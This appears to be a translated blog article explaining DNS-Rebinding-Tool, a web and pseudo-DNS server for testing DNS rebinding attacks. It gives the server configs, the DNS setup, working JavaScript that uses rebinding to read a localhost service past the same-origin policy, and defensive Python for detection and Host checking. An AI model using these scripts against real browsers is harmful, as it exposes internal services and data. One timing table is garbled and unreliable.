
What kind of script is DNS-Rebinding-Tool?

2025-01-19 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 05/31

This article explains in detail what kind of script DNS-Rebinding-Tool is. The editor thinks it is very practical, so I share it with you for reference. I hope you get something out of reading it.

DNS-Rebinding-Tool

DNS-Rebinding-Tool is a DNS rebinding tool with custom scripts. The project integrates a variety of features that can be used to test DNS rebinding attacks and help us learn more about this type of attack. The tool consists of a Web server and a pseudo-DNS server, which is mainly used to respond to user requests.

The root index of the Web server allows users to customize the configuration, and attack tests can be performed using the basic Web graphical interface.

The basic Nginx configuration of the Web server host is as follows:

    server {
        listen 80;
        server_name dnsrebindtool.43z.one;

        location / {
            proxy_pass http://localhost:5000;
        }
    }

The /attack path of the Web server reads the GET parameter "script", which carries a Base64-encoded JavaScript script, and responds to the request with the decoded code embedded in a regular HTML page:

    % curl "http://dnsrebindtool.43z.one/attack?script=YWxlcnQoMSk="
    setTimeout(function () {
      alert(1)
    }, 3000)

In the domain 43z.one that I registered, I configured an NS record for the subdomain rebind, pointing to the IP address where the tool is hosted:

    ns      A   81.4.124.10
    rebind  NS  ns.43z.one

The DNS server only responds to the following query requests:

    evcmxfm4g.81-4-124-10.127-0-0-1.rebind.43z.one

The first part (the subdomain label) is a random ID; a new one is generated for each attack session. The second part is the IP address the DNS server returns for the first two seconds, and the third part is the IP address it returns once that interval has elapsed:

    $ date && nslookup -type=a evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one
    Fri Feb 2 21:18:20 CET 2018
    Server: 8.8.8.8
    Address: 8.8.8.8#53

    Non-authoritative answer:
    Name: evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one
    Address: 81.4.124.10

    $ date && nslookup -type=a evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one
    Fri Feb 2 21:18:23 CET 2018
    Server: 8.8.8.8
    Address: 8.8.8.8#53

    Non-authoritative answer:
    Name: evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one
    Address: 127.0.0.1
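Seen from a resolver log, the exchange above has two recognisable traits: a query name that encodes IP addresses in its labels, and an answer that moves from a public to an internal address within seconds. The following Python sketch checks for both. It is an added example, not part of DNS-Rebinding-Tool; the log tuple format, the function names and the 60-second window are assumptions.

```python
import ipaddress
import re

# Name layout described above: <random id>.<first IP>.<second IP>.<zone>,
# with each IPv4 address written with dashes instead of dots.
REBIND_NAME = re.compile(
    r"^(?P<sid>[a-z0-9]+)\.(?P<first>\d{1,3}(?:-\d{1,3}){3})"
    r"\.(?P<second>\d{1,3}(?:-\d{1,3}){3})\.(?P<zone>.+)$"
)

def parse_rebind_name(qname):
    """Return (session id, first IP, second IP, zone), or None if no match."""
    m = REBIND_NAME.match(qname.lower().rstrip("."))
    if not m:
        return None
    try:
        first = ipaddress.IPv4Address(m["first"].replace("-", "."))
        second = ipaddress.IPv4Address(m["second"].replace("-", "."))
    except ipaddress.AddressValueError:
        return None  # digits were out of range, not a real address
    return m["sid"], first, second, m["zone"]

def is_internal(ip):
    return ip.is_loopback or ip.is_private or ip.is_link_local

def find_rebinds(records, window=60):
    """records: (epoch seconds, qname, answer IP) tuples in time order.
    Flag names whose answer moves from public to internal within `window`."""
    last_public = {}
    alerts = []
    for ts, qname, answer in records:
        ip = ipaddress.ip_address(answer)
        name = qname.lower().rstrip(".")
        if not is_internal(ip):
            last_public[name] = (ts, ip)
        elif name in last_public and ts - last_public[name][0] <= window:
            alerts.append((name, str(last_public[name][1]), str(ip)))
    return alerts

# Constructed sample log, modelled on the nslookup output above.
SAMPLE = [
    (1517602700, "evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one", "81.4.124.10"),
    (1517602703, "evcmxfm4b.81-4-124-10.127-0-0-1.rebind.43z.one", "127.0.0.1"),
    (1517602704, "www.example.com", "93.184.216.34"),
    (1517602705, "intranet.example.com", "10.0.0.5"),
]
```

A name that only ever resolves to an internal address, like the last sample entry, is not flagged; the signal is the change of answer for one and the same name.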

Finally, there is the Nginx configuration for the rebind domains. Only the /attack path is passed to the tool; any other path gets an error response. This mechanism allows attackers to attack other services on port 80 through all the other paths, such as /api/monitoring/stats:

    server {
        listen 80;
        server_name *.rebind.43z.one;

        location / {
            return 404;
        }

        location /attack {
            proxy_pass http://localhost:5000/attack;
        }
    }

DNS cache eviction

    var xhr = new XMLHttpRequest()
    xhr.open('GET', '//czg9g2olz.81-4-124-10.127-0-0-1.rebind.43z.one', false)
    xhr.send()
    // first time the browser sees this domain it queries the dns server
    // and gets 81.4.124.10

    // sleep for more than 2 sec

    xhr.open('GET', '//czg9g2olz.81-4-124-10.127-0-0-1.rebind.43z.one', false)
    xhr.send()
    // still uses 81.4.124.10 (AND NOT 127.0.0.1)
    // NO dns query happened browser used cached IP

This is a "common problem" with such attacks. For the attack to work, the browser has to issue a new DNS query so that it obtains the second IP address. My test results show that we can use the following script to measure the optimal value of the WAIT variable (the interval between requests). My test platform is Debian buster/sid and the browser version is Chromium 62.0.3202.89:

    var WAIT = 200
    var start = Date.now()

    // Repeat the request every WAIT ms until it succeeds
    var interval = setInterval(function () {
      var xhr = new XMLHttpRequest()
      xhr.open('GET', '//' + $REBIND_DOMAIN, false)
      xhr.send()

      if (xhr.status == 200) {
        // Show the elapsed time in seconds, then the response body
        document.body.innerHTML = (Date.now() - start) / 1000
        document.body.innerHTML += xhr.responseText
        clearInterval(interval)
        return
      }
    }, WAIT)

WAIT value (ms) / number of requests sent by Chrome / interval

070060107001006006312063150400631804007520030063220300692503007808730020063320340200713602007538020079400200831000100103

Complete test

    echo -e "HTTP/1.1 200 OK\n\n TOPSECRET" | sudo nc -lvp 80 -q1 127.0.0.1

This netcat instance serves some content that we are interested in. Here I keep the default rebinding domain "$RANDOM$.81-4-124-10.127-0-0-1.rebind.43z.one" and the default script:

    var start = Date.now()

    var interval = setInterval(function () {
      var xhr = new XMLHttpRequest()
      xhr.open('GET', '//' + $REBIND_DOMAIN, false)
      xhr.send()

      if (xhr.status == 200) {
        document.body.innerHTML = (Date.now() - start) / 1000
        document.body.innerHTML += xhr.responseText
        clearInterval(interval)
        return
      }
    }, 200)

Visit [dnsrebindtool.43z.one] and click the "Attack" button. Open the Network tab of the developer tools and we can directly see what is happening in the background. I filtered out the string "TOPSECRET", and our DNS rebinding attack successfully bypassed the same-origin policy (SOP). To get the leaked data out of the iframe, we also need to use window.postMessage() or forward the data to another server of the attacker.
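The netcat listener in the test answers every request regardless of the name it was addressed to. A request that arrives through rebinding still carries the rebind domain in its Host header, so a local service that checks that header refuses it. The sketch below is an added example, not part of the tool; the allowlist, port 8080 and the names host_allowed and Handler are assumptions.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Names this local service is legitimately reached by (assumed values).
ALLOWED_HOSTS = {"localhost", "127.0.0.1"}

def host_allowed(host_header, allowed=ALLOWED_HOSTS):
    """True only if the Host header names this service.
    Strips an optional :port and a trailing dot before comparing."""
    if not host_header:
        return False
    host = host_header.strip().lower()
    if host.startswith("["):              # IPv6 literal such as [::1]:80
        host = host[1:].split("]", 1)[0]
    elif ":" in host:
        host = host.rsplit(":", 1)[0]
    return host.rstrip(".") in allowed

class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        if not host_allowed(self.headers.get("Host")):
            # A rebound request reaches 127.0.0.1 but still names the
            # rebind domain here, so it is refused before any data is sent.
            self.send_error(403, "Host not allowed")
            return
        body = b"TOPSECRET\n"             # same marker as the test above
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

if __name__ == "__main__":
    # Bind to loopback only; the port is an arbitrary choice.
    HTTPServer(("127.0.0.1", 8080), Handler).serve_forever()
```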
